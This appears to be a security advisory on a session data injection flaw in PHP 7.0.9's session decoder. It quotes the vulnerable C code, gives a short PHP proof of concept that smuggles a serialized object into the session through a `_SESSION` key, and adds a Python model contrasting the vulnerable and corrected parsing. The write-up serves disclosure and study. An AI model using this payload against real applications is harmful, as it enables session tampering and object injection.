PHP 7.0.9 Session Data Injection Vulnerability
Description:
------------

PHP Session Data Injection Vulnerability

```c
PS_SERIALIZER_DECODE_FUNC(php) /* {{{ */
{
	...
	while (p < endptr) {
		zval **tmp;
		q = p;
		while (*q != PS_DELIMITER) {
			if (++q >= endptr) goto break_outer_loop;
		}

		if (p[0] == PS_UNDEF_MARKER) {
			p++;
			has_value = 0;
		} else {
			has_value = 1;
		}

		namelen = q - p;
		name = estrndup(p, namelen);
		q++;

		/* refuse names already bound to the global symbol table or to $_SESSION itself */
		if (zend_hash_find(&EG(symbol_table), name, namelen + 1, (void **) &tmp) == SUCCESS) {
			if ((Z_TYPE_PP(tmp) == IS_ARRAY && Z_ARRVAL_PP(tmp) == &EG(symbol_table)) || *tmp == PS(http_session_vars)) {
				goto skip;
			}
		}
		...
skip:
		efree(name);
		p = q;   /* resumes right after the delimiter: the refused entry's value is never consumed */
	}
```

If a variable name is one the decoder refuses (for example `_SESSION`, which is bound to `PS(http_session_vars)`), the php session handler jumps to `skip`, frees the name and continues parsing from `q`, which points immediately after the delimiter. The value bytes of the refused entry are never consumed, so the next iteration parses them as a fresh `name|value` pair. This means that an attacker who can control a session variable name is able to inject arbitrary session data. The same issue exists in the php_binary session handler.

PoC:

```php
<?php
ini_set('session.serialize_handler', 'php');
session_start();
// The stored record becomes `_SESSION|s:24:"ryat|O:8:"stdClass":0:{}";`.
// On the next read the name _SESSION is refused, and the bytes of its value
// are parsed as a new name|value entry carrying a serialized object.
$_SESSION['_SESSION'] = 'ryat|O:8:"stdClass":0:{}';
session_write_close();
session_start();
var_dump($_SESSION);
?>
```
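To make the mechanism concrete, the following Python model of the `php` serializer's decode loop is added here; it is not PHP's code. `unserialize_one` handles only the integer, string and empty-object forms the PoC record needs, `RESERVED` stands in for the symbol-table check that refuses the name, and `POC_RECORD` is a constructed copy of what the PoC stores. With `consume_skipped=False` the loop reproduces the `goto skip` path; with `True` it consumes and discards the refused entry's value, which is what a corrected decoder must do.

```python
import re

DELIM = "|"               # PS_DELIMITER
UNDEF = "!"               # PS_UNDEF_MARKER: name present, no value follows
RESERVED = {"_SESSION"}   # stands in for the symbol-table check that refuses the name

# Constructed record: what the PoC's session_write_close() stores.
POC_RECORD = '_SESSION|s:24:"ryat|O:8:"stdClass":0:{}";'

def unserialize_one(data: str, pos: int):
    """Parse one serialized value at data[pos:], return (value, end_pos).
    Subset of unserialize(): i:N;  s:N:"...";  O:N:"Class":0:{} (empty objects only)."""
    if data.startswith("i:", pos):
        m = re.compile(r"i:(-?\d+);").match(data, pos)
        if m:
            return int(m.group(1)), m.end()
    elif data.startswith("s:", pos):
        m = re.compile(r's:(\d+):"').match(data, pos)
        if m:
            n, start = int(m.group(1)), m.end()
            if data[start + n:start + n + 2] == '";':   # length-prefixed, so '|' inside is fine
                return data[start:start + n], start + n + 2
    elif data.startswith("O:", pos):
        m = re.compile(r'O:\d+:"([^"]*)":0:\{\}').match(data, pos)
        if m:
            return {"__class__": m.group(1)}, m.end()
    raise ValueError(f"unsupported or malformed value at offset {pos}")

def decode(data: str, consume_skipped: bool) -> dict:
    """Model of PS_SERIALIZER_DECODE_FUNC(php): repeated name|value entries."""
    out, p = {}, 0
    while p < len(data):
        q = data.find(DELIM, p)
        if q < 0:                      # break_outer_loop
            break
        name, has_value = data[p:q], True
        if name.startswith(UNDEF):
            name, has_value = name[1:], False
        p = q + 1                      # q++ : resume right after the delimiter
        if name in RESERVED:
            # Vulnerable path (goto skip): p stays on the value bytes, so the next
            # iteration reads them as a fresh name|value pair.
            # Hardened path: consume the value so it is discarded, not re-parsed.
            if consume_skipped and has_value:
                _, p = unserialize_one(data, p)
            continue
        if has_value:
            out[name], p = unserialize_one(data, p)
    return out

if __name__ == "__main__":
    print("vulnerable:", decode(POC_RECORD, False))
    print("hardened:  ", decode(POC_RECORD, True))
```

Against `POC_RECORD` the vulnerable path yields an injected entry whose name is the first piece of the smuggled value and whose value is the object, while the hardened path yields nothing.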